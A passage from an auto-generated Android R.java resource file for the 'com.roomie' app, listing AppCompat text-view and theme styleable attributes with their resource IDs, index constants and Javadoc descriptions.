android:drawableTop}</code></td><td></td></tr> <tr><td><code>{@link #AppCompatTextHelper_android_textAppearance android:textAppearance}</code></td><td></td></tr> </table> @see #AppCompatTextHelper_android_drawableBottom @see #AppCompatTextHelper_android_drawableEnd @see #AppCompatTextHelper_android_drawableLeft @see #AppCompatTextHelper_android_drawableRight @see #AppCompatTextHelper_android_drawableStart @see #AppCompatTextHelper_android_drawableTop @see #AppCompatTextHelper_android_textAppearance */ public static final int[] AppCompatTextHelper = { 0x01010034, 0x0101016d, 0x0101016e, 0x0101016f, 0x01010170, 0x01010392, 0x01010393 }; /** <p>This symbol is the offset where the {@link android.R.attr#drawableBottom} attribute's value can be found in the {@link #AppCompatTextHelper} array. @attr name android:drawableBottom */ public static final int AppCompatTextHelper_android_drawableBottom = 2; /** <p>This symbol is the offset where the {@link android.R.attr#drawableEnd} attribute's value can be found in the {@link #AppCompatTextHelper} array. @attr name android:drawableEnd */ public static final int AppCompatTextHelper_android_drawableEnd = 6; /** <p>This symbol is the offset where the {@link android.R.attr#drawableLeft} attribute's value can be found in the {@link #AppCompatTextHelper} array. @attr name android:drawableLeft */ public static final int AppCompatTextHelper_android_drawableLeft = 3; /** <p>This symbol is the offset where the {@link android.R.attr#drawableRight} attribute's value can be found in the {@link #AppCompatTextHelper} array. @attr name android:drawableRight */ public static final int AppCompatTextHelper_android_drawableRight = 4; /** <p>This symbol is the offset where the {@link android.R.attr#drawableStart} attribute's value can be found in the {@link #AppCompatTextHelper} array. @attr name android:drawableStart */ public static final int AppCompatTextHelper_android_drawableStart = 5; /** <p>This symbol is the offset where the {@link android.R.attr#drawableTop} attribute's value can be found in the {@link #AppCompatTextHelper} array. @attr name android:drawableTop */ public static final int AppCompatTextHelper_android_drawableTop = 1; /** <p>This symbol is the offset where the {@link android.R.attr#textAppearance} attribute's value can be found in the {@link #AppCompatTextHelper} array. @attr name android:textAppearance */ public static final int AppCompatTextHelper_android_textAppearance = 0; /** Attributes that can be used with a AppCompatTextView. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #AppCompatTextView_android_textAppearance android:textAppearance}</code></td><td></td></tr> <tr><td><code>{@link #AppCompatTextView_autoSizeMaxTextSize com.roomie:autoSizeMaxTextSize}</code></td><td> The maximum text size constraint to be used when auto-sizing text.</td></tr> <tr><td><code>{@link #AppCompatTextView_autoSizeMinTextSize com.roomie:autoSizeMinTextSize}</code></td><td> The minimum text size constraint to be used when auto-sizing text.</td></tr> <tr><td><code>{@link #AppCompatTextView_autoSizePresetSizes com.roomie:autoSizePresetSizes}</code></td><td> Resource array of dimensions to be used in conjunction with <code>autoSizeTextType</code> set to <code>uniform</code>.</td></tr> <tr><td><code>{@link #AppCompatTextView_autoSizeStepGranularity com.roomie:autoSizeStepGranularity}</code></td><td> Specify the auto-size step size if <code>autoSizeTextType</code> is set to <code>uniform</code>.</td></tr> <tr><td><code>{@link #AppCompatTextView_autoSizeTextType com.roomie:autoSizeTextType}</code></td><td> Specify the type of auto-size.</td></tr> <tr><td><code>{@link #AppCompatTextView_firstBaselineToTopHeight com.roomie:firstBaselineToTopHeight}</code></td><td> Distance from the top of the TextView to the first text baseline.</td></tr> <tr><td><code>{@link #AppCompatTextView_fontFamily com.roomie:fontFamily}</code></td><td> The attribute for the font family.</td></tr> <tr><td><code>{@link #AppCompatTextView_lastBaselineToBottomHeight com.roomie:lastBaselineToBottomHeight}</code></td><td> Distance from the bottom of the TextView to the last text baseline.</td></tr> <tr><td><code>{@link #AppCompatTextView_lineHeight com.roomie:lineHeight}</code></td><td> Explicit height between lines of text.</td></tr> <tr><td><code>{@link #AppCompatTextView_textAllCaps com.roomie:textAllCaps}</code></td><td> Present the text in ALL CAPS.</td></tr> </table> @see #AppCompatTextView_android_textAppearance @see #AppCompatTextView_autoSizeMaxTextSize @see #AppCompatTextView_autoSizeMinTextSize @see #AppCompatTextView_autoSizePresetSizes @see #AppCompatTextView_autoSizeStepGranularity @see #AppCompatTextView_autoSizeTextType @see #AppCompatTextView_firstBaselineToTopHeight @see #AppCompatTextView_fontFamily @see #AppCompatTextView_lastBaselineToBottomHeight @see #AppCompatTextView_lineHeight @see #AppCompatTextView_textAllCaps */ public static final int[] AppCompatTextView = { 0x01010034, 0x7f010057, 0x7f010058, 0x7f010059, 0x7f01005a, 0x7f01005b, 0x7f01005c, 0x7f01005d, 0x7f01005e, 0x7f01005f, 0x7f010060 }; /** <p>This symbol is the offset where the {@link android.R.attr#textAppearance} attribute's value can be found in the {@link #AppCompatTextView} array. @attr name android:textAppearance */ public static final int AppCompatTextView_android_textAppearance = 0; /** <p> @attr description The maximum text size constraint to be used when auto-sizing text. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:autoSizeMaxTextSize */ public static final int AppCompatTextView_autoSizeMaxTextSize = 6; /** <p> @attr description The minimum text size constraint to be used when auto-sizing text. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:autoSizeMinTextSize */ public static final int AppCompatTextView_autoSizeMinTextSize = 5; /** <p> @attr description Resource array of dimensions to be used in conjunction with <code>autoSizeTextType</code> set to <code>uniform</code>. Overrides <code>autoSizeStepGranularity</code> if set. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:autoSizePresetSizes */ public static final int AppCompatTextView_autoSizePresetSizes = 4; /** <p> @attr description Specify the auto-size step size if <code>autoSizeTextType</code> is set to <code>uniform</code>. The default is 1px. Overwrites <code>autoSizePresetSizes</code> if set. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:autoSizeStepGranularity */ public static final int AppCompatTextView_autoSizeStepGranularity = 3; /** <p> @attr description Specify the type of auto-size. Note that this feature is not supported by EditText, works only for TextView. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>none</code></td><td>0</td><td> No auto-sizing (default). </td></tr> <tr><td><code>uniform</code></td><td>1</td><td> Uniform horizontal and vertical text size scaling to fit within the container. </td></tr> </table> <p>This is a private symbol. @attr name com.roomie:autoSizeTextType */ public static final int AppCompatTextView_autoSizeTextType = 2; /** <p> @attr description Distance from the top of the TextView to the first text baseline. If set, this overrides the value set for paddingTop. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:firstBaselineToTopHeight */ public static final int AppCompatTextView_firstBaselineToTopHeight = 9; /** <p> @attr description The attribute for the font family. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:fontFamily */ public static final int AppCompatTextView_fontFamily = 7; /** <p> @attr description Distance from the bottom of the TextView to the last text baseline. If set, this overrides the value set for paddingBottom. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:lastBaselineToBottomHeight */ public static final int AppCompatTextView_lastBaselineToBottomHeight = 10; /** <p> @attr description Explicit height between lines of text. If set, this will override the values set for lineSpacingExtra and lineSpacingMultiplier. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:lineHeight */ public static final int AppCompatTextView_lineHeight = 8; /** <p> @attr description Present the text in ALL CAPS. This may use a small-caps form when available. <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This is a private symbol. @attr name com.roomie:textAllCaps */ public static final int AppCompatTextView_textAllCaps = 1; /** Attributes that can be used with a AppCompatTheme. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #AppCompatTheme_actionBarDivider com.roomie:actionBarDivider}</code></td><td> Custom divider drawable to use for elements in the action bar.</td></tr> <tr><td><code>{@link #AppCompatTheme_actionBarItemBackground com.roomie:actionBarItemBackground}</code></td><td> Custom item state list drawable background for action bar items.</td></tr> <tr><td><code>{@link #AppCompatTheme_actionBarPopupTheme com.roomie:actionBarPopupTheme}</code></td><td> Reference to a theme that should be used to inflate popups shown by widgets in the action bar.</td></tr> <tr><td><code>{@link #AppCompatTheme_actionBarSize com.roomie:actionBarSize}</code></td><td> Size of the Action Bar, including the contextual bar used to present Action Modes.</td></tr> <tr><td><code>{@link #AppCompatTheme_actionBarSplitStyle com.roomie:actionBarSplitStyle}</code></td><td> Reference to a style for the split Action Bar.</td></tr> <tr><td><code>{@link #AppCompatTheme_actionBarStyle com.roomie:actionBarStyle}</code></td><td> Reference to a style for the Action Bar </td></tr> <tr><td><code>{@link #AppCompatTheme_actionBarTabBarStyle com.roomie:actionBarTabBarStyle}</code></td><td></td></tr> <tr><td><code>{@link #AppCompatTheme_actionBarTabStyle com.roomie:actionBarTabStyle}</code></td><td> Default style for tabs within an action bar </td></tr> <tr><td><code>{@link #AppCompatTheme_actionBarTabTextStyle com.roomie:actionBarTabTextStyle}</code></td><td></td></tr> <tr><td><code>{@link #AppCompatTheme_actionBarTheme com.roomie:actionBarTheme}</code></td><td> Reference to a theme that should be used to inflate the action bar.</td></tr> <tr><td><code>{@link #AppCompatTheme_actionBarWidgetTheme com.roomie:actionBarWidgetTheme}</code></td><td> Reference to a theme that should be used to inflate widgets and layouts destined for the action bar.</td></tr> <tr><td><code>{@link #AppCompatTheme_actionButtonStyle com.roomie:actionButtonStyle}</code></td><td> Default action button style.</td></tr> <tr><td><code>{@link #AppCompatTheme_actionDropDownStyle com.roomie:actionDropDownStyle}</code></td><td> Default ActionBar dropdown style.</td></tr> <tr><td><code>{@link #AppCompatTheme_actionMenuTextAppearance com.roomie:actionMenuTextAppearance}</code></td><td> TextAppearance style that will be applied to text that appears within action menu items.</td></tr> <tr><td><code>{@link #AppCompatTheme_actionMenuTextColor com.roomie:actionMenuTextColor}</code></td><td> Color for text that appears within action menu items.</td></tr> <tr><td><code>{@link #AppCompatTheme_actionModeBackground com.roomie:actionModeBackground}</code></td><td> Background drawable to use for action mode UI </td></tr> <tr><td><code>{@link #AppCompatTheme_actionModeCloseButtonStyle com.roomie:actionModeCloseButtonStyle}</code></td><td></td></tr> <tr><td><code>{@link #AppCompatTheme_actionModeCloseDrawable com.roomie:actionModeCloseDrawable}</code></td><td> Drawable to use for the close action mode button </td></tr> <tr><td><code>{@link #AppCompatTheme_actionModeCopyDrawable com.roomie:actionModeCopyDrawable}</code></td><td> Drawable to use for the Copy action button in Contextual Action Bar </td></tr> <tr><td><code>{@link #AppCompatTheme_actionModeCutDrawable com.roomie:actionModeCutDrawable}</code></td><td> Drawable to use for the Cut action button in Contextual Action Bar </td></tr> <tr><td><code>{@link #AppCompatTheme_actionModeFindDrawable com.roomie:actionModeFindDrawable}</code></td><td> Drawable to use for the Find action button in WebView selection action modes </td></tr> <tr><td><code>{@link #AppCompatTheme_actionModePasteDrawable com.roomie:actionModePasteDrawable}</code></td><td> Drawable to use for the Paste action button in Contextual Action Bar </td></tr> <tr><td><code>{@link #AppCompatTheme_actionModePopupWindowStyle com.roomie:actionModePopupWindowStyle}</code></td><td> PopupWindow style to use for action modes when showing as a window overlay.</td></tr> <tr><td><code>{@link #AppCompatTheme_actionModeSelectAllDrawable com.roomie:actionModeSelectAllDrawable}</code></td><td> Drawable to use for the Select all action button in Contextual Action Bar </td></tr> <tr><td><code>{@link #AppCompatTheme_actionModeShareDrawable com.roomie:actionModeShareDrawable}</code></td><td> Drawable to use for the Share action button in WebView selection action modes </td></tr> <tr><td><code>{@link #AppCompatTheme_actionModeSplitBackground com.roomie:actionModeSplitBackground}</code></td><td> Background drawable to use for action mode UI in the lower split bar </td></tr> <tr><td><code>{@link #AppCompatTheme_actionModeStyle com.roomie:actionModeStyle}</code></td><td></td></tr> <tr><td><code>{@link #AppCompatTheme_actionModeWebSearchDrawable com.roomie:actionModeWebSearchDrawable}</code></td><td> Drawable to use for the Web Search action button in WebView selection action modes </td></tr> <tr><td><code>{@link #AppCompatTheme_actionOverflowButtonStyle com.roomie:actionOverflowButtonStyle}</code></td><td></td></tr> <tr><td><code>{@link #AppCompatTheme_actionOverflowMenuStyle com.roomie:actionOverflowMenuStyle}</code></td><td></td></tr> <tr><td><code>{@link #AppCompatTheme_activityChooserViewStyle com.roomie:activityChooserViewStyle}</code></td><td> Default ActivityChooserView style.</td></tr> <tr><td><code>{@link #AppCompatTheme_alertDialogButtonGroupStyle com.roomie:alertDialogButtonGroupStyle}</code></td><td></td></tr> <tr><td><code>{@link #AppCompatTheme_alertDialogCenterButtons com.roomie:alertDialogCenterButtons}</code></td><td></td></tr> <tr><td><code>{@link #AppCompatTheme_alertDialogStyle com.roomie:alertDialogStyle}</code></td><td></td></tr> <tr><td><code>{@link #AppCompatTheme_alertDialogTheme com.roomie:alertDialogTheme}</code></td><td> Theme to use for alert dialogs spawned from this theme.</td></tr> <tr><td><code>{@link #AppCompatTheme_android_windowAnimationStyle android:windowAnimationStyle}</code></td><td></td></tr> <tr><td><code>{@link #AppCompatTheme_android_windowIsFloating android:windowIsFloating}</code></td><td></td></tr> <tr><td><code>{@link #AppCompatTheme_autoCompleteTextViewStyle com.roomie:autoCompleteTextViewStyle}</code></td><td> Default AutoCompleteTextView style.</td></tr> <tr><td><code>{@link #AppCompatTheme_borderlessButtonStyle com.roomie:borderlessButtonStyle}</code></td><td> Style for buttons without an explicit border, often used in groups.</td></tr> <tr><td><code>{@link #AppCompatTheme_buttonBarButtonStyle com.roomie:buttonBarButtonStyle}</code></td><td> Style for buttons within button bars </td></tr> <tr><td><code>{@link #AppCompatTheme_buttonBarNegativeButtonStyle com.roomie:buttonBarNegativeButtonStyle}</code></td><td> Style for the "negative" buttons within button bars </td></tr> <tr><td><code>{@link #AppCompatTheme_buttonBarNeutralButtonStyle com.roomie:buttonBarNeutralButtonStyle}</code></td><td> Style for the "neutral" buttons within button bars </td></tr> <tr><td><code>{@link #AppCompatTheme_buttonBarPositiveButtonStyle com.roomie:buttonBarPositiveButtonStyle}</code></td><td> Style for the "positive" buttons within button bars </td></tr> <tr><td><code>{@link #AppCompatTheme_buttonBarStyle com.roomie:buttonBarStyle}</code></td><td> Style for button bars </td></tr> <tr><td><code>{@link #AppCompatTheme_buttonStyle com.roomie:buttonStyle}</code></td><td> Normal Button style.</td></tr> <tr><td><code>{@link #AppCompatTheme_buttonStyleSmall com.roomie:buttonStyleSmall}</code></td><td> Small Button style.</td></tr> <tr><td><code>{@link #AppCompatTheme_checkboxStyle com.roomie:checkboxStyle}</code></td><td> Default Checkbox style.</td></tr> <tr><td><code>{@link #AppCompatTheme_checkedTextViewStyle com.roomie:checkedTextViewStyle}</code></td><td> Default CheckedTextView style.</td></tr> <tr><td><code>{@link #AppCompatTheme_colorAccent com.roomie:colorAccent}</code></td><td> Bright complement to the primary branding color.</td></tr> <tr><td><code>{@link #AppCompatTheme_colorBackgroundFloating com.roomie:colorBackgroundFloating}</code></td><td> Default color of background imagery for floating components, ex.</td></tr> <tr><td><code>{@link #AppCompatTheme_colorButtonNormal com.roomie:colorButtonNormal}</code></td><td> The color applied to framework buttons in their normal state.</td></tr> <tr><td><code>{@link #AppCompatTheme_colorControlActivated com.roomie:colorControlActivated}</code></td><td> The color applied to framework controls in their activated (ex.</td></tr> <tr><td><code>{@link #AppCompatTheme_colorControlHighlight com.roomie:colorControlHighlight}</code></td><td> The color applied to framework control highlights (ex.</td></tr> <tr><td><code>{@link #AppCompatTheme_colorControlNormal com.roomie:colorControlNormal}</code></td><td> The color applied to framework controls in their normal state.</td></tr> <tr><td><code>{@link #AppCompatTheme_colorError com.roomie:colorError}</code></td><td> Color used for error states and things that need to be drawn to the user's attention.</td></tr> <tr><td><code>{@link #AppCompatTheme_colorPrimary com.roomie:colorPrimary}</code></td><td> The primary branding color for the app.</td></tr> <tr><td><code>{@link #AppCompatTheme_colorPrimaryDark com.roomie:colorPrimaryDark}</code></td><td> Dark variant of the primary branding color.</td></tr> <tr><td><code>{@link #AppCompatTheme_colorSwitchThumbNormal com.roomie:colorSwitchThumbNormal}</code></td><td> The color applied to framework switch thumbs in their normal state.</td></tr> <tr><td><code>{@link #AppCompatTheme_controlBackground com.roomie:controlBackground}</code></td><td> The background used by framework controls.</td></tr> <tr><td><code>{@link #AppCompatTheme_dialogCornerRadius com.roomie:dialogCornerRadius}</code></td><td> Preferred corner radius of dialogs.</td></tr> <tr><td><code>{@link #AppCompatTheme_dialogPreferredPadding com.roomie:dialogPreferredPadding}</code></td><td> Preferred padding for dialog content.</td></tr> <tr><td><code>{@link #AppCompatTheme_dialogTheme com.roomie:dialogTheme}</code></td><td> Theme to use for dialogs spawned from this theme.</td></tr> <tr><td><code>{@link #AppCompatTheme_dividerHorizontal com.roomie:dividerHorizontal}</code></td><td> A drawable that may be used as a horizontal divider between visual elements.</td></tr> <tr><td><code>{@link #AppCompatTheme_dividerVertical com.roomie:dividerVertical}</code></td><td> A drawable that may be used as a vertical divider between visual elements.</td></tr> <tr><td><code>{@link #AppCompatTheme_dropDownListViewStyle com.roomie:dropDownListViewStyle}</code></td><td> ListPopupWindow compatibility </td></tr> <tr><td><code>{@link #AppCompatTheme_dropdownListPreferredItemHeight com.roomie:dropdownListPreferredItemHeight}</code></td><td> The preferred item height for dropdown lists.</td></tr> <tr><td><code>{@link #AppCompatTheme_editTextBackground com.roomie:editTextBackground}</code></td><td> EditText background drawable.</td></tr> <tr><td><code>{@link #AppCompatTheme_editTextColor com.roomie:editTextColor}</code></td><td> EditText text foreground color.</td></tr> <tr><td><code>{@link #AppCompatTheme_editTextStyle com.roomie:editTextStyle}</code></td><td> Default EditText style.</td></tr> <tr><td><code>{@link #AppCompatTheme_homeAsUpIndicator com.roomie:homeAsUpIndicator}</code></td><td> Specifies a drawable to use for the 'home as up' indicator.</td></tr> <tr><td><code>{@link #AppCompatTheme_imageButtonStyle com.roomie:imageButtonStyle}</code></td><td> ImageButton background drawable.</td></tr> <tr><td><code>{@link #AppCompatTheme_listChoiceBackgroundIndicator com.roomie:listChoiceBackgroundIndicator}</code></td><td> Drawable used as a background for selected list items.</td></tr> <tr><td><code>{@link #AppCompatTheme_listDividerAlertDialog com.roomie:listDividerAlertDialog}</code></td><td> The list divider used in alert dialogs.</td></tr> <tr><td><code>{@link #AppCompatTheme_listMenuViewStyle com.roomie:listMenuViewStyle}</code></td><td> Default menu-style ListView style.</td></tr> <tr><td><code>{@link #AppCompatTheme_listPopupWindowStyle com.roomie:listPopupWindowStyle}</code></td><td></td></tr> <tr><td><code>{@link #AppCompatTheme_listPreferredItemHeight com.roomie:listPreferredItemHeight}</code></td><td> The preferred list item height.</td></tr> <tr><td><code>{@link #AppCompatTheme_listPreferredItemHeightLarge com.roomie:listPreferredItemHeightLarge}</code></td><td> A larger, more robust list item height.</td></tr> <tr><td><code>{@link #AppCompatTheme_listPreferredItemHeightSmall com.roomie:listPreferredItemHeightSmall}</code></td><td> A smaller, sleeker list item height.</td></tr> <tr><td><code>{@link #AppCompatTheme_listPreferredItemPaddingLeft com.roomie:listPreferredItemPaddingLeft}</code></td><td> The preferred padding along the left edge of list items.</td></tr> <tr><td><code>{@link #AppCompatTheme_listPreferredItemPaddingRight com.roomie:listPreferredItemPaddingRight}</code></td><td> The preferred padding along the right edge of list items.</td></tr> <tr><td><code>{@link #AppCompatTheme_panelBackground com.roomie:panelBackground}</code></td><td> The background of a panel when it is inset from the left and right edges of the screen.</td></tr> <tr><td><code>{@link #AppCompatTheme_panelMenuListTheme com.roomie:panelMenuListTheme}</code></td><td> Default Panel Menu style.</td></tr> <tr><td><code>{@link #AppCompatTheme_panelMenuListWidth com.roomie:panelMenuListWidth}</code></td><td> Default Panel Menu width.</td></tr> <tr><td><code>{@link #AppCompatTheme_popupMenuStyle com.roomie:popupMenuStyle}</code></td><td> Default PopupMenu style.</td></tr> <tr><td><code>{@link #AppCompatTheme_popupWindowStyle com.roomie:popupWindowStyle}</code></td><td> Default PopupWindow style.</td></tr> <tr><td><code>{@link #AppCompatTheme_radioButtonStyle com.roomie:radioButtonStyle}</code></td><td> Default RadioButton style.</td></tr> <tr><td><code>{@link #AppCompatTheme_ratingBarStyle com.roomie:ratingBarStyle}</code></td><td> Default RatingBar style.</td></tr> <tr><td><code>{@link #AppCompatTheme_ratingBarStyleIndicator com.roomie:ratingBarStyleIndicator}</code></td><td> Indicator RatingBar style.</td></tr> <tr><td><code>{@link #AppCompatTheme_ratingBarStyleSmall com.roomie:ratingBarStyleSmall}</code></td><td> Small indicator RatingBar style.</td></tr> <tr><td><code>{@link #AppCompatTheme_searchViewStyle com.roomie:searchViewStyle}</code></td><td> Style for the search query widget.</td></tr> <tr><td><code>{@link #AppCompatTheme_seekBarStyle com.roomie:seekBarStyle}</code></td><td> Default SeekBar style.</td></tr> <tr><td><code>{@link #AppCompatTheme_selectableItemBackground com.roomie:selectableItemBackground}</code></td><td> A style that may be applied to buttons or other selectable items that should react to pressed and focus states, but that do not have a clear visual border along the edges.</td></tr> <tr><td><code>{@link #AppCompatTheme_selectableItemBackgroundBorderless com.roomie:selectableItemBackgroundBorderless}</code></td><td> Background drawable for borderless standalone items that need focus/pressed states.</td></tr> <tr><td><code>{@link #AppCompatTheme_spinnerDropDownItemStyle com.roomie:spinnerDropDownItemStyle}</code></td><td> Default Spinner style.</td></tr> <tr><td><code>{@link #AppCompatTheme_spinnerStyle com.roomie:spinnerStyle}</code></td><td> Default Spinner style.</td></tr> <tr><td><code>{@link #AppCompatTheme_switchStyle com.roomie:switchStyle}</code></td><td> Default style for the Switch widget.</td></tr> <tr><td><code>{@link #AppCompatTheme_textAppearanceLargePopupMenu com.roomie:textAppearanceLargePopupMenu}</code></td><td> Text color, typeface, size, and style for the text inside of a popup menu.</td></tr> <tr><td><code>{@link #AppCompatTheme_textAppearanceListItem com.roomie:textAppearanceListItem}</code></td><td> The preferred TextAppearance for the primary text of list items.</td></tr> <tr><td><code>{@link #AppCompatTheme_textAppearanceListItemSecondary com.roomie:textAppearanceListItemSecondary}</code></td><td> The preferred TextAppearance for the secondary text of list items.</td></tr> <tr><td><code>{@link #AppCompatTheme_textAppearanceListItemSmall com.roomie:textAppearanceListItemSmall}</code></td><td> The preferred TextAppearance for the primary text of small list items.</td></tr> <tr><td><code>{@link #AppCompatTheme_textAppearancePopupMenuHeader com.roomie:textAppearancePopupMenuHeader}</code></td><td> Text color, typeface, size, and style for header text inside of a popup menu.</td></tr> <tr><td><code>{@link #AppCompatTheme_textAppearanceSearchResultSubtitle com.roomie:textAppearanceSearchResultSubtitle}</code></td><td> Text color, typeface, size, and style for system search result subtitle.</td></tr> <tr><td><code>{@link #AppCompatTheme_textAppearanceSearchResultTitle com.roomie:textAppearanceSearchResultTitle}</code></td><td> Text color, typeface, size, and style for system search result title.</td></tr> <tr><td><code>{@link #AppCompatTheme_textAppearanceSmallPopupMenu com.roomie:textAppearanceSmallPopupMenu}</code></td><td> Text color, typeface, size, and style for small text inside of a popup menu.</td></tr> <tr><td><code>{@link #AppCompatTheme_textColorAlertDialogListItem com.roomie:textColorAlertDialogListItem}</code></td><td> Color of list item text in alert dialogs.</td></tr> <tr><td><code>{@link #AppCompatTheme_textColorSearchUrl com.roomie:textColorSearchUrl}</code></td><td> Text color for urls in search suggestions, used by things like global search </td></tr> <tr><td><code>{@link #AppCompatTheme_toolbarNavigationButtonStyle com.roomie:toolbarNavigationButtonStyle}</code></td><td> Default Toolar NavigationButtonStyle </td></tr> <tr><td><code>{@link #AppCompatTheme_toolbarStyle com.roomie:toolbarStyle}</code></td><td> Default Toolbar style.</td></tr> <tr><td><code>{@link #AppCompatTheme_tooltipForegroundColor com.roomie:tooltipForegroundColor}</code></td><td> Foreground color to use for tooltips </td></tr> <tr><td><code>{@link #AppCompatTheme_tooltipFrameBackground com.roomie:tooltipFrameBackground}</code></td><td> Background to use for tooltips </td></tr> <tr><td><code>{@link #AppCompatTheme_viewInflaterClass com.roomie:viewInflaterClass}</code></td><td></td></tr> <tr><td><code>{@link #AppCompatTheme_windowActionBar com.roomie:windowActionBar}</code></td><td> Flag indicating whether this window should have an Action Bar in place of the usual title bar.</td></tr> <tr><td><code>{@link #AppCompatTheme_windowActionBarOverlay com.roomie:windowActionBarOverlay}</code></td><td> Flag indicating whether this window's Action Bar should overlay application content.</td></tr> <tr><td><code>{@link #AppCompatTheme_windowActionModeOverlay com.roomie:windowActionModeOverlay}</code></td><td> Flag indicating whether action modes should overlay window content when there is not reserved space for their UI (such as an Action Bar).</td></tr> <tr><td><code>{@link #AppCompatTheme_windowFixedHeightMajor com.roomie:windowFixedHeightMajor}</code></td><td> A fixed height for the window along the major axis of the screen, that is, when in portrait.</td></tr> <tr><td><code>{@link #AppCompatTheme_windowFixedHeightMinor com.roomie:windowFixedHeightMinor}</code></td><td> A fixed height for the window along the minor axis of the screen, that is, when in landscape.</td></tr> <tr><td><code>{@link #AppCompatTheme_windowFixedWidthMajor com.roomie:windowFixedWidthMajor}</code></td><td> A fixed width for the window along the major axis of the screen, that is, when in landscape.</td></tr> <tr><td><code>{@link #AppCompatTheme_windowFixedWidthMinor com.roomie:windowFixedWidthMinor}</code></td><td> A fixed width for the window along the minor axis of the screen, that is, when in portrait.</td></tr> <tr><td><code>{@link #AppCompatTheme_windowMinWidthMajor com.roomie:windowMinWidthMajor}</code></td><td> The minimum width the window is allowed to be, along the major axis of the screen.</td></tr> <tr><td><code>{@link #AppCompatTheme_windowMinWidthMinor com.roomie:windowMinWidthMinor}</code></td><td> The minimum width the window is allowed to be, along the minor axis of the screen.</td></tr> <tr><td><code>{@link #AppCompatTheme_windowNoTitle com.roomie:windowNoTitle}</code></td><td> Flag indicating whether there should be no title on this window.</td></tr> </table> @see #AppCompatTheme_actionBarDivider @see #AppCompatTheme_actionBarItemBackground @see #AppCompatTheme_actionBarPopupTheme @see #AppCompatTheme_actionBarSize @see #AppCompatTheme_actionBarSplitStyle @see #AppCompatTheme_actionBarStyle @see #AppCompatTheme_actionBarTabBarStyle @see #AppCompatTheme_actionBarTabStyle @see #AppCompatTheme_actionBarTabTextStyle @see #AppCompatTheme_actionBarTheme @see #AppCompatTheme_actionBarWidgetTheme @see #AppCompatTheme_actionButtonStyle @see #AppCompatTheme_actionDropDownStyle @see #AppCompatTheme_actionMenuTextAppearance @see #AppCompatTheme_actionMenuTextColor @see #AppCompatTheme_actionModeBackground @see #AppCompatTheme_actionModeCloseButtonStyle @see #AppCompatTheme_actionModeCloseDrawable @see #AppCompatTheme_actionModeCopyDrawable @see #AppCompatTheme_actionModeCutDrawable @see #AppCompatTheme_actionModeFindDrawable @see #AppCompatTheme_actionModePasteDrawable @see #AppCompatTheme_actionModePopupWindowStyle @see #AppCompatTheme_actionModeSelectAllDrawable @see #AppCompatTheme_actionModeShareDrawable @see #AppCompatTheme_actionModeSplitBackground @see #AppCompatTheme_actionModeStyle @see #AppCompatTheme_actionModeWebSearchDrawable @see #AppCompatTheme_actionOverflowButtonStyle @see #AppCompatTheme_actionOverflowMenuStyle @see #AppCompatTheme_activityChooserViewStyle @see 